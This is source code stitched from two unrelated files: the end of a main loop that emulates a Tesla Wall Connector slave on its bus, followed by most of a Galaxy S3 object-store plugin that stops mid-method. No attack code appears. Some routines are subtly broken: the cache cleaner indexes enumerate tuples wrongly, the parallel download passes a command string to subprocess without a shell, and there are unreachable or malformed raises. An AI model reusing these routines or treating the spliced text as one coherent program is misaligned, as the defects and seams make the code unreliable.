heartbeatData = msgMatch.group(3)
master.setMasterTWCID(senderID)
try:
slaveTWC = master.slaveTWCs[receiverID]
except KeyError:
slaveTWC = master.newSlave(receiverID, 80)
slaveTWC.masterHeartbeatData = heartbeatData
if receiverID != fakeTWCID:
# This message was intended for another slave.
# Ignore it.
logger.log(
logging.DEBUG2,
"Master %02X%02X sent "
"heartbeat message %s to receiver %02X%02X "
"that isn't our fake slave."
% (
senderID[0],
senderID[1],
hex_str(heartbeatData),
receiverID[0],
receiverID[1],
),
)
continue
amps = (
master.slaveHeartbeatData[1] << 8
) + master.slaveHeartbeatData[2]
master.addkWhDelivered(
(master.convertAmpsToWatts(amps / 100) / 1000 / 60 / 60)
* (now - timeLastkWhDelivered)
)
timeLastkWhDelivered = now
if time.time() - timeLastkWhSaved >= 300.0:
timeLastkWhSaved = now
logger.log(
logging.INFO9,
"Fake slave has delivered %.3fkWh"
% (master.getkWhDelivered()),
)
# Save settings to file
master.queue_background_task({"cmd": "saveSettings"})
if heartbeatData[0] == 0x07:
# Lower amps in use (not amps allowed) by 2 for 10
# seconds. Set state to 07.
master.slaveHeartbeatData[0] = heartbeatData[0]
timeToRaise2A = now + 10
amps -= 280
master.slaveHeartbeatData[3] = (amps >> 8) & 0xFF
master.slaveHeartbeatData[4] = amps & 0xFF
elif heartbeatData[0] == 0x06:
# Raise amp setpoint by 2 permanently and reply with
# state 06. After 44 seconds, report state 0A.
timeTo0Aafter06 = now + 44
master.slaveHeartbeatData[0] = heartbeatData[0]
amps += 200
master.slaveHeartbeatData[1] = (amps >> 8) & 0xFF
master.slaveHeartbeatData[2] = amps & 0xFF
amps -= 80
master.slaveHeartbeatData[3] = (amps >> 8) & 0xFF
master.slaveHeartbeatData[4] = amps & 0xFF
elif (
heartbeatData[0] == 0x05
or heartbeatData[0] == 0x08
or heartbeatData[0] == 0x09
):
if ((heartbeatData[1] << 8) + heartbeatData[2]) > 0:
# A real slave mimics master's status bytes [1]-[2]
# representing max charger power even if the master
# sends it a crazy value.
master.slaveHeartbeatData[1] = heartbeatData[1]
master.slaveHeartbeatData[2] = heartbeatData[2]
ampsUsed = (heartbeatData[1] << 8) + heartbeatData[2]
ampsUsed -= 80
master.slaveHeartbeatData[3] = (ampsUsed >> 8) & 0xFF
master.slaveHeartbeatData[4] = ampsUsed & 0xFF
elif heartbeatData[0] == 0:
if timeTo0Aafter06 > 0 and timeTo0Aafter06 < now:
timeTo0Aafter06 = 0
master.slaveHeartbeatData[0] = 0x0A
elif timeToRaise2A > 0 and timeToRaise2A < now:
# Real slave raises amps used by 2 exactly 10
# seconds after being sent into state 07. It raises
# a bit slowly and sets its state to 0A 13 seconds
# after state 07. We aren't exactly emulating that
# timing here but hopefully close enough.
timeToRaise2A = 0
amps -= 80
master.slaveHeartbeatData[3] = (amps >> 8) & 0xFF
master.slaveHeartbeatData[4] = amps & 0xFF
master.slaveHeartbeatData[0] = 0x0A
elif heartbeatData[0] == 0x02:
logger.info(
"Master heartbeat contains error %ld: %s"
% (heartbeatData[1], hex_str(heartbeatData))
)
else:
logger.info("UNKNOWN MHB state %s" % (hex_str(heartbeatData)))
# Slaves always respond to master's heartbeat by sending
# theirs back.
slaveTWC.send_slave_heartbeat(senderID)
slaveTWC.print_status(master.slaveHeartbeatData)
else:
msgMatch = re.search(
b"\A\xfc\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
# Handle 2-hour idle message
#
# This message is sent from a Master TWC three times in a
# row every 2 hours:
# c0 fc 1d 00 00 00 00 00 00 00 00 00 00 00 1d c0
#
# I'd say this is used to indicate the master is still
# alive, but it doesn't contain the Master's TWCID or any other
# data so I don't see what any receiving TWC can do with it.
#
# I suspect this message is only sent when the master
# doesn't see any other TWCs on the network, so I don't
# bother to have our fake master send these messages being
# as there's no point in playing a fake master with no
# slaves around.
foundMsgMatch = True
logger.info("Received 2-hour idle message from Master.")
else:
msgMatch = re.search(
b"\A\xfd\xe2(..)(.)(..)\x00\x00\x00\x00\x00\x00.+\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
# Handle linkready message from slave on network that
# presumably isn't us.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
maxAmps = ((msgMatch.group(3)[0] << 8) + msgMatch.group(3)[1]) / 100
logger.info(
"%.2f amp slave TWC %02X%02X is ready to link. Sign: %s"
% (maxAmps, senderID[0], senderID[1], hex_str(sign))
)
if senderID == fakeTWCID:
logger.info(
"ERROR: Received slave heartbeat message from "
"slave %02X%02X that has the same TWCID as our fake slave."
% (senderID[0], senderID[1])
)
continue
master.newSlave(senderID, maxAmps)
else:
msgMatch = re.search(
b"\A\xfd\xe0(..)(..)(.......+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle heartbeat message from slave on network that
# presumably isn't us.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
heartbeatData = msgMatch.group(3)
if senderID == fakeTWCID:
logger.info(
"ERROR: Received slave heartbeat message from "
"slave %02X%02X that has the same TWCID as our fake slave."
% (senderID[0], senderID[1])
)
continue
try:
slaveTWC = master.slaveTWCs[senderID]
except KeyError:
# Slave is unlikely to send another linkready since it's
# already linked with a real Master TWC, so just assume
# it's 80A.
slaveTWC = master.newSlave(senderID, 80)
slaveTWC.print_status(heartbeatData)
else:
msgMatch = re.search(
b"\A\xfb\xeb(..)(..)(\x00\x00\x00\x00\x00\x00\x00\x00\x00+?).\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
# Handle voltage request message. This is only supported in
# Protocol 2 so we always reply with a 16-byte message.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
if senderID == fakeTWCID:
logger.info(
"ERROR: Received voltage request message from "
"TWC %02X%02X that has the same TWCID as our fake slave."
% (senderID[0], senderID[1])
)
continue
logger.log(
logging.INFO8,
"VRQ from %02X%02X to %02X%02X"
% (senderID[0], senderID[1], receiverID[0], receiverID[1]),
)
if receiverID == fakeTWCID:
kWhCounter = int(master.getkWhDelivered())
kWhPacked = bytearray(
[
((kWhCounter >> 24) & 0xFF),
((kWhCounter >> 16) & 0xFF),
((kWhCounter >> 8) & 0xFF),
(kWhCounter & 0xFF),
]
)
logger.info(
"VRS %02X%02X: %dkWh (%s) %dV %dV %dV"
% (
fakeTWCID[0],
fakeTWCID[1],
kWhCounter,
hex_str(kWhPacked),
240,
0,
0,
)
)
master.getInterfaceModule().send(
bytearray(b"\xFD\xEB")
+ fakeTWCID
+ kWhPacked
+ bytearray(b"\x00\xF0\x00\x00\x00\x00\x00")
)
else:
msgMatch = re.search(
b"\A\xfd\xeb(..)(.........+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle voltage response message.
# Example US value:
# FD EB 7777 00000014 00F6 0000 0000 00
# EU value (3 phase power):
# FD EB 7777 00000038 00E6 00F1 00E8 00
foundMsgMatch = True
senderID = msgMatch.group(1)
data = msgMatch.group(2)
kWhCounter = (
(data[0] << 24) + (data[1] << 16) + (data[2] << 8) + data[3]
)
voltsPhaseA = (data[4] << 8) + data[5]
voltsPhaseB = (data[6] << 8) + data[7]
voltsPhaseC = (data[8] << 8) + data[9]
# Update this detail for the Slave TWC
master.updateSlaveLifetime(
senderID, kWhCounter, voltsPhaseA, voltsPhaseB, voltsPhaseC
)
if senderID == fakeTWCID:
logger.info(
"ERROR: Received voltage response message from "
"TWC %02X%02X that has the same TWCID as our fake slave."
% (senderID[0], senderID[1])
)
continue
logger.info(
"VRS %02X%02X: %dkWh %dV %dV %dV"
% (
senderID[0],
senderID[1],
kWhCounter,
voltsPhaseA,
voltsPhaseB,
voltsPhaseC,
)
)
if foundMsgMatch == False:
logger.info("***UNKNOWN MESSAGE from master: " + hex_str(msg))
except KeyboardInterrupt:
logger.info("Exiting after background tasks complete...")
break
except Exception as e:
# Print info about unhandled exceptions, then continue. Search for
# 'Traceback' to find these in the log.
traceback.print_exc()
logger.info("Unhandled Exception:" + traceback.format_exc())
# Sleep 5 seconds so the user might see the error.
time.sleep(5)
# Make sure any volatile data is written to disk before exiting
master.queue_background_task({"cmd": "saveSettings"})
# Wait for background tasks thread to finish all tasks.
# Note that there is no such thing as backgroundTasksThread.stop(). Because we
# set the thread type to daemon, it will be automatically killed when we exit
# this program.
master.backgroundTasksQueue.join()
# Close the input module
master.getInterfaceModule().close()
#
# End main program
#
##############################
|
s3.py | """
Object Store plugin for the Amazon Simple Storage Service (S3)
"""
import logging
import multiprocessing
import os
import shutil
import subprocess
import threading
import time
from datetime import datetime
from galaxy.exceptions import ObjectNotFound
from galaxy.util import string_as_bool, umask_fix_perms
from galaxy.util.directory_hash import directory_hash_id
from galaxy.util.sleeper import Sleeper
from .s3_multipart_upload import multipart_upload
from ..objectstore import ObjectStore, convert_bytes
try:
# Imports are done this way to allow objectstore code to be used outside of Galaxy.
import boto
from boto.s3.key import Key
from boto.s3.connection import S3Connection
from boto.exception import S3ResponseError
except ImportError:
boto = None
NO_BOTO_ERROR_MESSAGE = ("S3/Swift object store configured, but no boto dependency available."
"Please install and properly configure boto or modify object store configuration.")
log = logging.getLogger( __name__ )
logging.getLogger('boto').setLevel(logging.INFO) # Otherwise boto is quite noisy
class S3ObjectStore(ObjectStore):
"""
Object store that stores objects as items in an AWS S3 bucket. A local
cache exists that is used as an intermediate location for files between
Galaxy and S3.
"""
    def __init__(self, config, config_xml):
        """Initialize the store: parse the XML config, open the S3 connection,
        resolve the bucket handle, and start the cache-cleaning thread.

        :param config: Galaxy configuration object; this reads ``file_path``
            and (indirectly) ``object_store_cache_path``, ``umask``, ``gid``.
        :param config_xml: XML element describing this object store.
        :raises Exception: if the ``boto`` dependency is not installed.
        """
        if boto is None:
            raise Exception(NO_BOTO_ERROR_MESSAGE)
        super(S3ObjectStore, self).__init__(config)
        self.staging_path = self.config.file_path
        # Counter advanced by _transfer_cb while boto transfers run.
        self.transfer_progress = 0
        self._parse_config_xml(config_xml)
        self._configure_connection()
        # Replace the configured bucket *name* with an actual bucket handle.
        self.bucket = self._get_bucket(self.bucket)
        # Clean cache only if value is set in galaxy.ini
        if self.cache_size != -1:
            # Convert GBs to bytes for comparison
            self.cache_size = self.cache_size * 1073741824
        # Helper for interruptable sleep
        self.sleeper = Sleeper()
        self.cache_monitor_thread = threading.Thread(target=self.__cache_monitor)
        self.cache_monitor_thread.start()
        log.info("Cache cleaner manager started")
        # Test if 'axel' is available for parallel download and pull the key into cache
        # (calling it with no args: OSError means the binary is missing).
        try:
            subprocess.call('axel')
            self.use_axel = True
        except OSError:
            self.use_axel = False
    def _configure_connection(self):
        """Open a boto ``S3Connection`` with the credentials parsed from XML."""
        log.debug("Configuring S3 Connection")
        self.conn = S3Connection(self.access_key, self.secret_key)
    def _parse_config_xml(self, config_xml):
        """Read store settings out of ``config_xml`` onto ``self``.

        Populates auth credentials, bucket options, connection parameters
        (the ``<connection>`` element is optional), cache settings, extra
        directories, and the ``self.s3server`` dict consumed by the
        multipart upload helper.

        :raises Exception: re-raises any parsing error after logging, since
            the object store cannot operate on a malformed configuration.
        """
        try:
            a_xml = config_xml.findall('auth')[0]
            self.access_key = a_xml.get('access_key')
            self.secret_key = a_xml.get('secret_key')
            b_xml = config_xml.findall('bucket')[0]
            self.bucket = b_xml.get('name')
            self.use_rr = string_as_bool(b_xml.get('use_reduced_redundancy', "False"))
            self.max_chunk_size = int(b_xml.get('max_chunk_size', 250))
            cn_xml = config_xml.findall('connection')
            # <connection> may be absent; an empty dict lets the .get()
            # calls below fall back to their defaults.
            if not cn_xml:
                cn_xml = {}
            else:
                cn_xml = cn_xml[0]
            self.host = cn_xml.get('host', None)
            self.port = int(cn_xml.get('port', 6000))
            self.multipart = string_as_bool(cn_xml.get('multipart', 'True'))
            self.is_secure = string_as_bool(cn_xml.get('is_secure', 'True'))
            self.conn_path = cn_xml.get('conn_path', '/')
            c_xml = config_xml.findall('cache')[0]
            # Cache size is configured in GB (-1 means unbounded); __init__
            # converts it to bytes afterwards.
            self.cache_size = float(c_xml.get('size', -1))
            self.staging_path = c_xml.get('path', self.config.object_store_cache_path)
            for d_xml in config_xml.findall('extra_dir'):
                self.extra_dirs[d_xml.get('type')] = d_xml.get('path')
            log.debug("Object cache dir: %s", self.staging_path)
            log.debug(" job work dir: %s", self.extra_dirs['job_work'])
            # for multipart upload
            self.s3server = {'access_key': self.access_key,
                             'secret_key': self.secret_key,
                             'is_secure': self.is_secure,
                             'max_chunk_size': self.max_chunk_size,
                             'host': self.host,
                             'port': self.port,
                             'use_rr': self.use_rr,
                             'conn_path': self.conn_path}
        except Exception:
            # Toss it back up after logging, we can't continue loading at this point.
            log.exception("Malformed ObjectStore Configuration XML -- unable to continue")
            raise
def __cache_monitor(self):
time.sleep(2) # Wait for things to load before starting the monitor
while self.running:
total_size = 0
# Is this going to be too expensive of an operation to be done frequently?
file_list = []
for dirpath, _, filenames in os.walk(self.staging_path):
for filename in filenames:
filepath = os.path.join(dirpath, filename)
file_size = os.path.getsize(filepath)
total_size += file_size
# Get the time given file was last accessed
last_access_time = time.localtime(os.stat(filepath)[7])
# Compose a tuple of the access time and the file path
file_tuple = last_access_time, filepath, file_size
file_list.append(file_tuple)
# Sort the file list (based on access time)
file_list.sort()
# Initiate cleaning once within 10% of the defined cache size?
cache_limit = self.cache_size * 0.9
if total_size > cache_limit:
log.info("Initiating cache cleaning: current cache size: %s; clean until smaller than: %s",
convert_bytes(total_size), convert_bytes(cache_limit))
# How much to delete? If simply deleting up to the cache-10% limit,
# is likely to be deleting frequently and may run the risk of hitting
# the limit - maybe delete additional #%?
# For now, delete enough to leave at least 10% of the total cache free
delete_this_much = total_size - cache_limit
self.__clean_cache(file_list, delete_this_much)
self.sleeper.sleep(30) # Test cache size every 30 seconds?
def __clean_cache(self, file_list, delete_this_much):
""" Keep deleting files from the file_list until the size of the deleted
files is greater than the value in delete_this_much parameter.
:type file_list: list
:param file_list: List of candidate files that can be deleted. This method
will start deleting files from the beginning of the list so the list
should be sorted accordingly. The list must contains 3-element tuples,
positioned as follows: position 0 holds file last accessed timestamp
(as time.struct_time), position 1 holds file path, and position 2 has
file size (e.g., (<access time>, /mnt/data/dataset_1.dat), 472394)
:type delete_this_much: int
:param delete_this_much: Total size of files, in bytes, that should be deleted.
"""
# Keep deleting datasets from file_list until deleted_amount does not
# exceed delete_this_much; start deleting from the front of the file list,
# which assumes the oldest files come first on the list.
deleted_amount = 0
for entry in enumerate(file_list):
if deleted_amount < delete_this_much:
deleted_amount += entry[2]
os.remove(entry[1])
# Debugging code for printing deleted files' stats
# folder, file_name = os.path.split(f[1])
# file_date = time.strftime("%m/%d/%y %H:%M:%S", f[0])
# log.debug("%s. %-25s %s, size %s (deleted %s/%s)" \
# % (i, file_name, convert_bytes(f[2]), file_date, \
# convert_bytes(deleted_amount), convert_bytes(delete_this_much)))
else:
log.debug("Cache cleaning done. Total space freed: %s", convert_bytes(deleted_amount))
return
    def _get_bucket(self, bucket_name):
        """ Sometimes a handle to a bucket is not established right away so try
        it a few times (5 attempts, 2s apart), creating the bucket if it does
        not exist yet. Raise an error if a connection is not established. """
        for i in range(5):
            try:
                bucket = self.conn.get_bucket(bucket_name)
                log.debug("Using cloud object store with bucket '%s'", bucket.name)
                return bucket
            except S3ResponseError:
                try:
                    # The bucket may simply not exist yet; try to create it.
                    log.debug("Bucket not found, creating s3 bucket with handle '%s'", bucket_name)
                    self.conn.create_bucket(bucket_name)
                except S3ResponseError:
                    log.exception("Could not get bucket '%s', attempt %s/5", bucket_name, i + 1)
                    time.sleep(2)
        # All the attempts have been exhausted and connection was not established,
        # raise error
        # NOTE(review): raising the exception *class* bare will try to
        # instantiate it with no arguments; boto's S3ResponseError normally
        # takes status/reason -- confirm this raises cleanly at runtime.
        raise S3ResponseError
def _fix_permissions(self, rel_path):
""" Set permissions on rel_path"""
for basedir, _, files in os.walk(rel_path):
umask_fix_perms(basedir, self.config.umask, 0o777, self.config.gid)
for filename in files:
path = os.path.join(basedir, filename)
# Ignore symlinks
if os.path.islink(path):
continue
umask_fix_perms( path, self.config.umask, 0o666, self.config.gid )
def _construct_path(self, obj, base_dir=None, dir_only=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False, **kwargs):
rel_path = os.path.join(*directory_hash_id(obj.id))
if extra_dir is not None:
if extra_dir_at_root:
rel_path = os.path.join(extra_dir, rel_path)
else:
rel_path = os.path.join(rel_path, extra_dir)
# for JOB_WORK directory
if obj_dir:
rel_path = os.path.join(rel_path, str(obj.id))
if base_dir:
base = self.extra_dirs.get(base_dir)
return os.path.join(base, rel_path)
# S3 folders are marked by having trailing '/' so add it now
rel_path = '%s/' % rel_path
if not dir_only:
rel_path = os.path.join(rel_path, alt_name if alt_name else "dataset_%s.dat" % obj.id)
return rel_path
def _get_cache_path(self, rel_path):
return os.path.abspath(os.path.join(self.staging_path, rel_path))
def _get_transfer_progress(self):
return self.transfer_progress
    def _get_size_in_s3(self, rel_path):
        """Return the size in bytes of key ``rel_path`` in the bucket, or -1
        when the key does not exist or the lookup fails."""
        try:
            key = self.bucket.get_key(rel_path)
            # get_key returns None for a missing key; fall through to -1.
            if key:
                return key.size
        except S3ResponseError:
            log.exception("Could not get size of key '%s' from S3", rel_path)
        return -1
def _key_exists(self, rel_path):
exists = False
try:
# A hackish way of testing if the rel_path is a folder vs a file
is_dir = rel_path[-1] == '/'
if is_dir:
keyresult = self.bucket.get_all_keys(prefix=rel_path)
if len(keyresult) > 0:
exists = True
else:
exists = False
else:
key = Key(self.bucket, rel_path)
exists = key.exists()
except S3ResponseError:
log.exception("Trouble checking existence of S3 key '%s'", rel_path)
return False
if rel_path[0] == '/':
raise
return exists
def _in_cache(self, rel_path):
""" Check if the given dataset is in the local cache and return True if so. """
# log.debug("------ Checking cache for rel_path %s" % rel_path)
cache_path = self._get_cache_path(rel_path)
return os.path.exists(cache_path)
# TODO: Part of checking if a file is in cache should be to ensure the
# size of the cached file matches that on S3. Once the upload tool explicitly
# creates, this check sould be implemented- in the mean time, it's not
# looking likely to be implementable reliably.
# if os.path.exists(cache_path):
# # print "***1 %s exists" % cache_path
# if self._key_exists(rel_path):
# # print "***2 %s exists in S3" % rel_path
# # Make sure the size in cache is available in its entirety
# # print "File '%s' cache size: %s, S3 size: %s" % (cache_path, os.path.getsize(cache_path), self._get_size_in_s3(rel_path))
# if os.path.getsize(cache_path) == self._get_size_in_s3(rel_path):
# # print "***2.1 %s exists in S3 and the size is the same as in cache (in_cache=True)" % rel_path
# exists = True
# else:
# # print "***2.2 %s exists but differs in size from cache (in_cache=False)" % cache_path
# exists = False
# else:
# # Although not perfect decision making, this most likely means
# # that the file is currently being uploaded
# # print "***3 %s found in cache but not in S3 (in_cache=True)" % cache_path
# exists = True
# else:
# return False
def _pull_into_cache(self, rel_path):
# Ensure the cache directory structure exists (e.g., dataset_#_files/)
rel_path_dir = os.path.dirname(rel_path)
if not os.path.exists(self._get_cache_path(rel_path_dir)):
os.makedirs(self._get_cache_path(rel_path_dir))
# Now pull in the file
file_ok = self._download(rel_path)
self._fix_permissions(self._get_cache_path(rel_path_dir))
return file_ok
def _transfer_cb(self, complete, total):
self.transfer_progress += 10
def _download(self, rel_path):
try:
log.debug("Pulling key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
key = self.bucket.get_key(rel_path)
# Test if cache is large enough to hold the new file
if self.cache_size > 0 and key.size > self.cache_size:
log.critical("File %s is larger (%s) than the cache size (%s). Cannot download.",
rel_path, key.size, self.cache_size)
return False
if self.use_axel:
log.debug("Parallel pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
ncores = multiprocessing.cpu_count()
url = key.generate_url(7200)
ret_code = subprocess.call("axel -a -n %s '%s'" % (ncores, url))
if ret_code == 0:
return True
else:
log.debug("Pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
self.transfer_progress = 0 # Reset transfer progress counter
key.get_contents_to_filename(self._get_cache_path(rel_path), cb=self._transfer_cb, num_cb=10)
return True
except S3ResponseError:
log.exception("Problem downloading key '%s' from S3 bucket '%s'", rel_path, self.bucket.name)
return False
    def _push_to_os(self, rel_path, source_file=None, from_string=None):
        """
        Push the file pointed to by ``rel_path`` to the object store naming the key
        ``rel_path``. If ``source_file`` is provided, push that file instead while
        still using ``rel_path`` as the key name.
        If ``from_string`` is provided, set contents of the file to the value of
        the string.

        Returns ``True`` on success (including the skipped empty-file case),
        ``False`` when the source file is missing or an S3 error occurs.
        """
        try:
            # Default the source to the cached copy of rel_path.
            source_file = source_file if source_file else self._get_cache_path(rel_path)
            if os.path.exists(source_file):
                key = Key(self.bucket, rel_path)
                # Uploading an empty file over an existing key is a no-op; skip it.
                if os.path.getsize(source_file) == 0 and key.exists():
                    log.debug("Wanted to push file '%s' to S3 key '%s' but its size is 0; skipping.", source_file, rel_path)
                    return True
                if from_string:
                    key.set_contents_from_string(from_string, reduced_redundancy=self.use_rr)
                    log.debug("Pushed data from string '%s' to key '%s'", from_string, rel_path)
                else:
                    start_time = datetime.now()
                    log.debug("Pushing cache file '%s' of size %s bytes to key '%s'", source_file, os.path.getsize(source_file), rel_path)
                    mb_size = os.path.getsize(source_file) / 1e6
                    # Small files (or multipart disabled) go up in a single
                    # call; larger ones use the multipart upload helper.
                    if mb_size < 10 or (not self.multipart):
                        self.transfer_progress = 0  # Reset transfer progress counter
                        key.set_contents_from_filename(source_file,
                                                       reduced_redundancy=self.use_rr,
                                                       cb=self._transfer_cb,
                                                       num_cb=10)
                    else:
                        multipart_upload(self.s3server, self.bucket, key.name, source_file, mb_size)
                    end_time = datetime.now()
                    log.debug("Pushed cache file '%s' to key '%s' (%s bytes transfered in %s sec)",
                              source_file, rel_path, os.path.getsize(source_file), end_time - start_time)
                return True
            else:
                log.error("Tried updating key '%s' from source file '%s', but source file does not exist.",
                          rel_path, source_file)
        except S3ResponseError:
            log.exception("Trouble pushing S3 key '%s' from file '%s'", rel_path, source_file)
        return False
    def file_ready(self, obj, **kwargs):
        """
        A helper method that checks if a file corresponding to a dataset is
        ready and available to be used. Return ``True`` if so, ``False`` otherwise.

        "Ready" means the locally cached copy has the same size as the copy
        in S3, i.e. any in-flight transfer into the cache has completed.
        """
        rel_path = self._construct_path(obj, **kwargs)
        # Make sure the size in cache is available in its entirety
        if self._in_cache(rel_path):
            if os.path.getsize(self._get_cache_path(rel_path)) == self._get_size_in_s3(rel_path):
                return True
            log.debug("Waiting for dataset %s to transfer from OS: %s/%s", rel_path,
                      os.path.getsize(self._get_cache_path(rel_path)), self._get_size_in_s3(rel_path))
        return False
    def exists(self, obj, **kwargs):
        """Return ``True`` if ``obj`` exists in the local cache or in S3.

        Side effects: when the object is cached but absent from S3 it is
        pushed to S3 before returning, and a missing job-work directory is
        created on demand for ``base_dir`` requests.
        """
        in_cache = in_s3 = False
        rel_path = self._construct_path(obj, **kwargs)
        # Check cache
        if self._in_cache(rel_path):
            in_cache = True
        # Check S3
        in_s3 = self._key_exists(rel_path)
        # log.debug("~~~~~~ File '%s' exists in cache: %s; in s3: %s" % (rel_path, in_cache, in_s3))
        # dir_only does not get synced so shortcut the decision
        dir_only = kwargs.get('dir_only', False)
        base_dir = kwargs.get('base_dir', None)
        if dir_only:
            if in_cache or in_s3:
                return True
            # for JOB_WORK directory
            elif base_dir:
                if not os.path.exists(rel_path):
                    os.makedirs(rel_path)
                return True
            else:
                return False
        # TODO: Sync should probably not be done here. Add this to an async upload stack?
        if in_cache and not in_s3:
            self._push_to_os(rel_path, source_file=self._get_cache_path(rel_path))
            return True
        elif in_s3:
            return True
        else:
            return False
    def create(self, obj, **kwargs):
        """Create ``obj`` in the store if it does not already exist.

        Builds the hashed directory structure in the local cache and, unless
        ``dir_only`` is requested, creates an empty dataset file in both the
        cache and S3.
        """
        if not self.exists(obj, **kwargs):
            # Pull out locally used fields
            extra_dir = kwargs.get('extra_dir', None)
            extra_dir_at_root = kwargs.get('extra_dir_at_root', False)
            dir_only = kwargs.get('dir_only', False)
            alt_name = kwargs.get('alt_name', None)
            # Construct hashed path
            rel_path = os.path.join(*directory_hash_id(obj.id))
            # Optionally append extra_dir
            if extra_dir is not None:
                if extra_dir_at_root:
                    rel_path = os.path.join(extra_dir, rel_path)
                else:
                    rel_path = os.path.join(rel_path, extra_dir)
            # Create given directory in cache
            cache_dir = os.path.join(self.staging_path, rel_path)
            if not os.path.exists(cache_dir):
                os.makedirs(cache_dir)
            # Although not really necessary to create S3 folders (because S3 has
            # flat namespace), do so for consistency with the regular file system
            # S3 folders are marked by having trailing '/' so add it now
            # s3_dir = '%s/' % rel_path
            # self._push_to_os(s3_dir, from_string='')
            # If instructed, create the dataset in cache & in S3
            if not dir_only:
                rel_path = os.path.join(rel_path, alt_name if alt_name else "dataset_%s.dat" % obj.id)
                open(os.path.join(self.staging_path, rel_path), 'w').close()
                self._push_to_os(rel_path, from_string='')
def empty(self, obj, **kwargs):
if self.exists(obj, **kwargs):
return bool(self.size(obj, **kwargs) > 0)
else:
raise ObjectNotFound( 'objectstore.empty, object does not exist: %s, kwargs: %s'
% ( str( obj ), str( kwargs ) ) )
    def size(self, obj, **kwargs):
        """Return the size of ``obj`` in bytes.

        Prefers the locally cached copy; falls back to asking S3, and
        returns 0 (with a warning) when the object is found in neither.
        """
        rel_path = self._construct_path(obj, **kwargs)
        if self._in_cache(rel_path):
            try:
                return os.path.getsize(self._get_cache_path(rel_path))
            except OSError as ex:
                log.info("Could not get size of file '%s' in local cache, will try S3. Error: %s", rel_path, ex)
        elif self.exists(obj, **kwargs):
            return self._get_size_in_s3(rel_path)
        log.warning("Did not find dataset '%s', returning 0 for size", rel_path)
        return 0
def delete(self, obj, entire_dir=False, **kwargs):
    """Delete the dataset (or directory) for ``obj`` from the cache and S3.

    :param bool entire_dir: together with ``extra_dir``, remove the whole
        directory tree and every matching S3 key
    :returns: True on success, False if any S3 or filesystem error occurred
    """
    rel_path = self._construct_path(obj, **kwargs)
    extra_dir = kwargs.get('extra_dir', None)
    base_dir = kwargs.get('base_dir', None)
    dir_only = kwargs.get('dir_only', False)
    obj_dir = kwargs.get('obj_dir', False)
    try:
        # Remove temporary data in JOB_WORK directory
        if base_dir and dir_only and obj_dir:
            shutil.rmtree(os.path.abspath(rel_path))
            return True
        # For the case of extra_files, because we don't have a reference to
        # individual files/keys we need to remove the entire directory structure
        # with all the files in it. This is easy for the local file system,
        # but requires iterating through each individual key in S3 and deleting it.
        if entire_dir and extra_dir:
            shutil.rmtree(self._get_cache_path(rel_path))
            results = self.bucket.get_all_keys(prefix=rel_path)
            for key in results:
                log.debug("Deleting key %s", key.name)
                key.delete()
            return True
        else:
            # Delete from cache first
            os.unlink(self._get_cache_path(rel_path))
            # Delete from S3 as well
            if self._key_exists(rel_path):
                key = Key(self.bucket, rel_path)
                log.debug("Deleting key %s", key.name)
                key.delete()
            return True
    except S3ResponseError:
        log.exception("Could not delete key '%s' from S3", rel_path)
    except OSError:
        log.exception('%s delete error', self.get_filename(obj, **kwargs))
    return False
def get_data(self, obj, start=0, count=-1, **kwargs):
    """Return ``count`` characters of the dataset for ``obj`` starting at
    offset ``start`` (``count=-1`` reads to end of file).

    Pulls the dataset into the local cache from S3 first if needed.
    """
    rel_path = self._construct_path(obj, **kwargs)
    # Check cache first and get file if not there
    if not self._in_cache(rel_path):
        self._pull_into_cache(rel_path)
    # Read the file content from cache. 'with' guarantees the handle is
    # closed even if seek/read raises (the original leaked it on error).
    with open(self._get_cache_path(rel_path), 'r') as data_file:
        data_file.seek(start)
        return data_file.read(count)
def get_filename(self, obj, **kwargs):
    """Return a local filesystem path for ``obj``, pulling the dataset into
    the cache from S3 when necessary.

    :raises ObjectNotFound: if the object exists in neither cache nor S3
    """
    base_dir = kwargs.get('base_dir', None)
    dir_only = kwargs.get('dir_only', False)
    obj_dir = kwargs.get('obj_dir', False)
    rel_path = self._construct_path(obj, **kwargs)
    # for JOB_WORK directory
    if base_dir and dir_only and obj_dir:
        return os.path.abspath(rel_path)
    cache_path = self._get_cache_path(rel_path)
    # S3 does not recognize directories as files so cannot check if those exist.
    # So, if checking dir only, ensure given dir exists in cache and return
    # the expected cache path.
    # dir_only = kwargs.get('dir_only', False)
    # if dir_only:
    #     if not os.path.exists(cache_path):
    #         os.makedirs(cache_path)
    #     return cache_path
    # Check if the file exists in the cache first
    if self._in_cache(rel_path):
        return cache_path
    # Check if the file exists in persistent storage and, if it does, pull it into cache
    elif self.exists(obj, **kwargs):
        if dir_only:  # Directories do not get pulled into cache
            return cache_path
        else:
            if self._pull_into_cache(rel_path):
                return cache_path
    # For the case of retrieving a directory only, return the expected path
    # even if it does not exist.
    # if dir_only:
    #     return cache_path
    raise ObjectNotFound('objectstore.get_filename, no cache_path: %s, kwargs: %s'
                         % (str(obj), str(kwargs)))
    # return cache_path  # Until the upload tool does not explicitly create the dataset, return expected path
def update_from_file(self, obj, file_name=None, create=False, **kwargs):
    """Replace the stored dataset for ``obj`` with new content.

    :param str file_name: if given, copy this file into the cache and push
        it; otherwise push the current cached copy as-is
    :param bool create: create the object first if it does not exist
    :raises ObjectNotFound: if the object does not exist (after the
        optional create)
    """
    if create:
        self.create(obj, **kwargs)
    if self.exists(obj, **kwargs):
        rel_path = self._construct_path(obj, **kwargs)
        # Choose whether to use the dataset file itself or an alternate file
        if file_name:
            source_file = os.path.abspath(file_name)
            # Copy into cache
            cache_file = self._get_cache_path(rel_path)
            try:
                if source_file != cache_file:
                    # FIXME? Should this be a `move`?
                    shutil.copy2(source_file, cache_file)
